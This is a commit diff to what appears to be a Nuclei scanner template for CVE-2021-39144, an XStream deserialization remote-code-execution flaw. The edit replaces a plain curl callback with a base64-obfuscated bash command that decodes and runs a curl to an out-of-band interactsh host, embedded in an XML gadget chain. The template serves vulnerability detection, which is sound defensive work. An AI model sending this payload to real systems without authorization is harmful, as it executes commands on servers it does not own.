Update CVE-2021-39144.yaml
parent
166cc9ef1d
commit
81dea5dafb
|
@ -19,6 +19,9 @@ info:
|
|||
cwe-id: CWE-94,CWE-502
|
||||
tags: cve,cve2021,xstream,deserialization,rce,kev
|
||||
|
||||
variables:
|
||||
rand: "{{rand_base(6)}}"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
|
@ -61,7 +64,7 @@ requests:
|
|||
</probes>
|
||||
</handler>
|
||||
</dynamic-proxy>
|
||||
<string>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</string>
|
||||
<string>/bin/bash -c {echo,{{base64("curl http://{{interactsh-url}} -H \'User-Agent: {{rand}}\'")}}}|{base64,-d}|{bash,-i}</string>
|
||||
</java.util.PriorityQueue>
|
||||
</java.util.PriorityQueue>
|
||||
|
||||
|
@ -75,6 +78,6 @@ requests:
|
|||
- type: word
|
||||
part: interactsh_request
|
||||
words:
|
||||
- "User-Agent: {{rand_base(6)}}"
|
||||
- "User-Agent: {{rand}}"
|
||||
|
||||
# Enhanced by cs on 2023/04/17
|
||||
|
|
Loading…
Reference in New Issue